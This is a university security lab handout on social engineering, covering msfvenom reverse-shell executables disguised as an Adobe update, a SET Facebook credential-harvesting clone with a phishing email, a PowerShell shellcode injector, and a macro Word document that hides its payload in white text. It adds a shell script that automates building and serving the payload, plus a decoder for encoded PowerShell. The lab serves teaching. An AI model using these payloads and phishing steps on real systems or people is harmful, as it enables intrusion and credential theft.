Source: community.mis.temple.edu/.../2018/...2018-Temple.docx (web view)

Lab 9: Social Engineering

Today, social engineering attacks are a primary vector for attackers. As Bruce Schneier said, “Only amateurs attack machines; professionals target people.”1 Further, client-side software represents a much larger attack surface than server-side software. For these reasons, many of the major breaches you read about in the news began with a client-side attack.

1 https://www.schneier.com/crypto-gram-0010.html

In this lab you’ll use two leading tools to perform client-side attacks: msfvenom and the Social Engineering Toolkit (SET).

Part 1. MSFVenom

In this section, you’ll use msfvenom to perform a client-side attack. Msfvenom can be used to turn Metasploit payloads into stand-alone executables that a user can be tricked into running. Your goal is to (1) create a malicious executable file, (2) host it on a web server, and (3) exploit your Windows 10 VM.

1. Open your Kali Linux and Windows 10 VMs. Make sure that both can ping each other.

2. On Windows, make sure Windows Defender is turned off: click the Windows button at the bottom left of the desktop, search for “Defender,” choose “Windows Defender Security Center,” and move the “Real-time protection” slider to the left (off). This is necessary because the stock, unencoded msfvenom executable you are about to build is well known to antivirus signatures; a real attacker would have to evade the AV rather than switch it off.

3. In Kali, type msfvenom --help-formats to see a list of output formats that msfvenom supports. We’ll use the “-f exe” option to create a Windows executable.

4. In Kali, run the following command, all on one line:

msfvenom -p windows/shell/reverse_tcp LHOST=[your Kali IP] LPORT=8080 -f exe > /tmp/AdobeUpdate.exe

Where:

-p      Selects the payload
-f      Selects the file type of the output executable
LHOST   The IP of your Kali Linux VM
LPORT   The listening port on your Kali Linux VM

5. Verify that the output file is about 73802 bytes in size (the exact size depends on your Metasploit version, but it must be non-zero). If it is empty or far smaller than that, check that you entered the command correctly and run it again.

6. Now, set up a web server to host your malicious file. Change directories to /tmp by entering cd /tmp.

7. Still in Kali, run this command:

python -m SimpleHTTPServer 8888

You should see a response that the Python web server is listening on port 8888 on IP 0.0.0.0, which means all IP addresses on the local machine.

Note: SimpleHTTPServer is the Python 2 module. On a current Kali image, where python is Python 3, the equivalent command is python3 -m http.server 8888.

8. On your Windows 10 VM, browse to:

http://[IP of your Kali VM]:8888/

Verify that you can view the contents of /tmp on your Kali VM.

9. On Kali, open a new terminal window (besides the one that is running the Python webserver), and enter msfconsole.

10. Enter use exploit/multi/handler. Once you’ve switched to this module, type show info. Note that this module “is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.” In other words, multi/handler does not exploit anything itself: it only listens for the connection that a payload delivered by some other means (here, the executable the user is tricked into running) makes back to your Kali VM.

11. Enter set PAYLOAD windows/shell/reverse_tcp.

12. Enter set LHOST [IP of Kali VM].

13. Enter set LPORT 8080.

Note: Set the port to “8080” (the port your malicious executable will use to connect back to your Kali VM), not “8888” (the port of your Python web server on Kali).

14. Enter exploit -j. The “-j” option “jobifies” the exploit, or runs it as a job in the background. You can see a list of jobs running in the background by using the command jobs.

15. On your Windows 10 VM, in a web browser (not Chrome, whose download protection will most likely block the file), download the AdobeUpdate.exe file from the Python web server and run the executable. If a warning appears saying that Windows couldn’t access Windows SmartScreen, click “Run anyway.” For the warning “Do you want to allow this app from an unknown publisher…,” click “Yes.”

16. On your Kali VM, you should see in msfconsole that “Command shell session X opened,” where X is the number of the new session. Type:

sessions -i [the number of the new session]

This should open a shell on the Windows VM.

17. Type whoami to see the user you are running as. Note that these are the privileges of the logged-in user of your Windows 10 VM, not SYSTEM: the payload inherits the rights of whoever ran it.

18. Run the command netstat -n to see a listing of open connections on the Windows VM. Note the “ESTABLISHED” connection from the Windows VM to port 8080 on your Kali VM.

19. Return to msfconsole by pressing Ctrl+Z. Enter “y” to background the session.

20. To close the session, type sessions -k [the number of the session].
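The Part 1 steps above, collected into one reusable script. This is an added example, not part of the lab handout or of Metasploit: it assumes a Kali VM with msfvenom and msfconsole on PATH, and the IP address 192.168.56.101, file name, ports and payload are placeholders you override from the environment. Instead of eyeballing a byte count it checks for the PE “MZ” signature, and it drives steps 9 to 14 through a msfconsole resource file (a standard msfconsole -r feature), so the handler’s payload, LHOST and LPORT always match what was compiled into the executable.

```shell
#!/bin/sh
# Added example for the Part 1 procedure (not part of the lab handout).
# Wraps the build / check / host / listen steps in shell functions so the
# whole chain can be re-run with one command. Assumes a Kali VM with
# msfvenom and msfconsole on PATH; everything below is a lab placeholder
# that can be overridden from the environment.

LHOST="${LHOST:-192.168.56.101}"              # assumed Kali VM IP
LPORT="${LPORT:-8080}"                        # port the payload calls back to
WEBPORT="${WEBPORT:-8888}"                    # port of the throwaway web server
PAYLOAD="${PAYLOAD:-windows/shell/reverse_tcp}"
OUT="${OUT:-/tmp/AdobeUpdate.exe}"

# Step 4: the msfvenom command line. -o writes the file directly, which
# avoids the shell redirect in the lab and behaves the same in any shell.
payload_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$OUT"
}

# Step 5: the "about 73802 bytes" figure only holds for one Metasploit
# version. A check that survives upgrades: the file is non-empty and
# starts with the "MZ" signature that every Windows executable carries.
check_pe() {
    [ -s "$1" ] || return 1
    [ "$(head -c 2 "$1")" = "MZ" ]
}

# Steps 9-14 as a msfconsole resource script: msfconsole -q -r FILE runs
# these lines at startup, so the handler is never typed by hand (and the
# 8080-vs-8888 mix-up the lab warns about cannot happen).
write_handler_rc() {
    cat >"$1" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
exploit -j
EOF
}

# Steps 6-7: the command that hosts the payload's directory. Current Kali
# ships Python 3, where the module is http.server (its --directory flag
# needs Python 3.7+); SimpleHTTPServer exists only on Python 2.
serve_cmd() {
    if command -v python3 >/dev/null 2>&1; then
        printf 'python3 -m http.server %s --directory %s\n' \
            "$WEBPORT" "$(dirname "$OUT")"
    else
        printf 'cd %s && python -m SimpleHTTPServer %s\n' \
            "$(dirname "$OUT")" "$WEBPORT"
    fi
}

# End-to-end: build the payload, verify it, write the handler script and
# print the two remaining commands to run in separate terminals.
run_lab() {
    command -v msfvenom >/dev/null 2>&1 || { echo "msfvenom not found on PATH" >&2; return 1; }
    sh -c "$(payload_cmd)" || return 1
    check_pe "$OUT" || { echo "$OUT is missing or not a PE file" >&2; return 1; }
    write_handler_rc /tmp/handler.rc
    echo "Terminal 1: $(serve_cmd)"
    echo "Terminal 2: msfconsole -q -r /tmp/handler.rc"
    echo "Then fetch http://$LHOST:$WEBPORT/$(basename "$OUT") on the Windows VM"
}
```

Save it as lab9.sh and run `. ./lab9.sh && run_lab` (or `LHOST=10.0.0.5 run_lab`): it builds and checks the payload, writes /tmp/handler.rc and prints the web-server and msfconsole commands for the other two terminals. The same write_handler_rc pattern covers the handler in Part 5 with PAYLOAD=windows/meterpreter/reverse_tcp.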

Part 2. Social Engineering Toolkit (SET)

In this section, you’ll use the Social Engineering Toolkit (SET) to craft social engineering attacks.

Setup

Get the latest version of SET by entering the following commands in the Kali terminal (note: this lab was written for SET v. 6.0.5):

cd /opt/
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

Note: There is a space before the word ‘set/’.

Edit /opt/set/src/core/config.baseline and scroll to the bottom of the document. Change BLEEDING_EDGE=OFF to BLEEDING_EDGE=ON

Save the file and exit.

1. Return to the /opt/set directory and run the command ./setoolkit (don’t forget the “./” at the front). Agree to the terms of service. You should see a screen like the following:

2. Enter option 1 for social-engineering attacks. That should display this menu:

3. Select option 2 for website attack vectors. The next menu will list the various web attack vectors:

4. Select number 3 for a credential harvesting attack. This brings you to the following screen:

5. Select option 2 to clone a target website. This feature fetches the target’s page and rehosts a copy whose login form posts back to SET, which records the submitted fields and then redirects the victim to the real site. After you’ve selected this feature, you’ll need to set an IP address to host the cloned site. Set “IP address for the POST back in Harvester/Tabnabbing” to the IP address of your Kali Linux VM.

Now you get to choose the website to clone. Set the cloned website to https://www.facebook.com (enter the full URL, including “https://”).

Note: When SET asks you about Apache, enable it to start the webserver.

If all has gone well, you should get the following screen:

6. Now it’s time to script the phishing message to send. At this point, an attacker would use a tool or service to send a spoofed email. For simplicity, skip this step and instead send an email to your own email account with the message:

“You are receiving this email because there is a problem with your account. Please go to www.facebook.com and login to verify your account."

Use rich text formatting to make “www.facebook.com” a hyperlink that points to http://[IP of your Kali VM].

7. When you receive the email, click the link, which should forward you to this page:

Note: the address bar shows the actual IP of the attacker, and the page is served over plain http:// rather than https://. These are the biggest indications that the site is forged. A more sophisticated attacker would register a domain that looks similar to Facebook’s (like facebook.webs.com); free DNS services such as http://freedns.afraid.org are one way to obtain such a name.

8. Enter credentials into the fields on the spoofed website. After you’ve filled the fields in with whatever words you wish, press the login button on the website. On your Kali VM, you should see something similar to this in your terminal window:

Part 3: Using PowerShell Shellcode Injector

In this section, you will generate an encoded PowerShell script and execute it on Windows, which opens a Meterpreter session to the attacker’s machine. Note that this script requires the user to bypass the PowerShell execution policy; it is your job to convince the victim to do this.

1. From the SET menu, choose 1 for Social-Engineering Attacks.

2. Select 9 for PowerShell Attack Vectors.

3. Within this option you will find four different features; select 1 for PowerShell Alphanumeric Shellcode Injector.

4. Enter your Kali VM IP address and port 443. Choose yes to start the listener. This automatically starts msfconsole, so it will take a minute or two.

5. While waiting, open another terminal and navigate to /root/.set/reports/powershell/

6. Open the script using the leafpad command:

leafpad x86_powershell_injection.txt

7. Copy the entire script from leafpad and paste it into the Windows command prompt as the figure below depicts, then press Enter.

8. You should see an opened Meterpreter session:

Note: Although the Meterpreter session opens, msfconsole may not drop you into the Meterpreter shell. To interact with the open session, type sessions -i 1 (or the session number msfconsole reported when the session opened).

Optional: you can save the entire script as a Windows batch file (.bat) and trick the user into running that file.

Question: Do you need administrator rights to run this PowerShell script? What other ways could you trick a user into running this script?
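Before handing the Part 3 launcher to a victim (or when you find one on a host), it is worth reading back what the encoded blob actually runs. The following is an added example, not part of the lab or of SET: it decodes PowerShell’s -EncodedCommand argument, which is the script in UTF-16LE, base64-encoded, and flags the keywords that shellcode injectors and downloaders tend to contain. The SAMPLE command line is constructed for this example (the well-known encoding of whoami), and the extraction regex assumes the plain -e/-ec/-enc/-EncodedCommand form; SET’s generated launcher text wraps the flag differently, so for x86_powershell_injection.txt copy the base64 blob out by hand and pass it to decode_ps.

```shell
#!/bin/sh
# Added example (not from the lab or from SET): read back what an encoded
# PowerShell launcher actually runs. PowerShell's -EncodedCommand argument
# is base64 of the script in UTF-16LE; for an ASCII script every second
# byte is 0x00, so dropping NULs after base64-decoding recovers the text
# with plain coreutils (no iconv needed). Non-ASCII scripts need iconv.

# Constructed sample, not SET output: the well-known encoding of "whoami",
# with the execution-policy bypass that Part 3 relies on.
SAMPLE='powershell.exe -NoP -W Hidden -Ep Bypass -Enc dwBoAG8AYQBtAGkA'

# Return the base64 blob that follows -e / -ec / -enc / -EncodedCommand
# (PowerShell accepts any unambiguous prefix; flags are case-insensitive).
# "-ep bypass" is deliberately not matched: "bypass" is valid base64 text.
extract_encoded() {
    printf '%s\n' "$1" | sed -nE \
        's#.*-([Ee]|[Ee][Cc]|[Ee][Nn][Cc]([Oo][Dd][Ee][Dd][Cc][Oo][Mm][Mm][Aa][Nn][Dd])?)[[:space:]]+([A-Za-z0-9+/=]+).*#\3#p'
}

# base64 -> UTF-16LE -> ASCII by stripping the zero high bytes.
decode_ps() {
    printf '%s' "$1" | base64 -d 2>/dev/null | tr -d '\000'
}

# Full command line in, decoded script out; fails if no encoded argument.
inspect_ps() {
    enc=$(extract_encoded "$1")
    [ -n "$enc" ] || { echo "no -EncodedCommand argument found" >&2; return 1; }
    decode_ps "$enc"
}

# Keywords typical of in-memory injectors and downloaders (the classic
# PowerShell shellcode injectors, SET's included, P/Invoke VirtualAlloc
# and CreateThread). Prints the distinct hits one per line, nothing for a
# script that contains none of them.
flag_indicators() {
    printf '%s\n' "$1" | grep -oiE \
        'VirtualAlloc|CreateThread|DllImport|IEX|Invoke-Expression|DownloadString|FromBase64String' \
        | sort -u
}
```

Source the file and call `inspect_ps "$SAMPLE"` to get `whoami` back, or `flag_indicators "$(inspect_ps "$line")"` on a captured command line to see at a glance whether it allocates executable memory or pulls a second stage from the network.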

Part 4. SET Discovery

Complete one other attack of your choosing using SET, and briefly describe your results below.

SET attack 1:

Note: If you encounter problems after running site cloning attacks more than once, you may need to delete index.html or index2.html from /var/www/html in between attempts.

Part 5. Create a Malicious Microsoft Word Document

In this section, you’ll create a macro-enabled Microsoft Word file that opens a Meterpreter session on an attacker’s machine. Note that this is a feature of Word, not a security vulnerability. For this reason, this attack vector will work as long as you can convince a user to open the Word file and enable its macros.

1. In Kali, run the following command (all one line):

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=[IP of your Kali VM] LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

2. Read the beginning of the output. It explains that the output is divided into two sections: A “Macro” section and a “Payload” section. Copy all of the output from your terminal from this command, and paste it into a text file on your Windows VM (or onto a machine with Microsoft Word).

3. In Kali, run msfconsole and run the following commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 8080
set LHOST [IP of your Kali VM]
exploit -j

The above commands will cause Metasploit to listen on port 8080 for an incoming Meterpreter connection.

4. Open Word on your host workstation and open the Visual Basic editor. To do this, from the File tab, select Options. Select “Customize Ribbon” from the left-hand side menu, and check the Developer checkbox (see screenshot below).

From the Developer ribbon, select “Visual Basic” to open the Visual Basic editor.

Inside the Visual Basic editor, right-click the document in the project pane and select Insert > Module. Open the text file that you copied over from Kali and paste in the VB code (the “Macro” section, but not the payload). Save it as a Word macro-enabled document and close the VB editor.

5. In the main body of the Word document, paste the payload hex code. Above the hex code, type a simple memo as the ostensible content of the document. Next, highlight the hex code you pasted in and change the font size to “1” and the font color to white. This hides the hex code from anyone who opens the document, while the macro can still read it from the document text. Finally, save the document as a macro-enabled Word file (with a “.docm” extension). Name the file something like “Sales Memo.”

Optional: “In order to keep user suspicion low, try embedding the code in one of the many Word macro games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.” From Metasploit: The Penetration Tester’s Guide.

6. Test your malicious Word file by opening it on the Windows 10 VM. If Word asks, enable macro content. In the Kali VM, you should now see that a Meterpreter session has been opened from the machine that opened the document. If it doesn’t work, make sure that macros are enabled in Word (Developer tab > Macro Security > Enable all macros).

Optional: Use the sendEmail command on Kali to send a spoofed email with the malicious Word file as an attachment. To see how the sendEmail command works, type man sendEmail.

Lifelong Learning

“Ghost in the Wires” by Kevin Mitnick

Autobiography of Kevin Mitnick, famed computer hacker and social engineer. In addition to being a very entertaining and fascinating read, you’ll learn a lot about social engineering techniques from the accounts of his experiences.

BYU Library: http://search.lib.byu.edu/byu/id:byu5094356 Amazon: http://amzn.com/0316037729

“The Art of Deception” by Kevin Mitnick

In-depth discussion of the techniques of social engineering and how to educate your organization to be less susceptible to these attacks.

Amazon: http://amzn.com/076454280X

“Social Engineering” by Christopher Hadnagy

Another well-regarded book on social engineering, from the organization that operates the Social Engineer Village at DEF CON.

Amazon: http://amzn.com/0470639539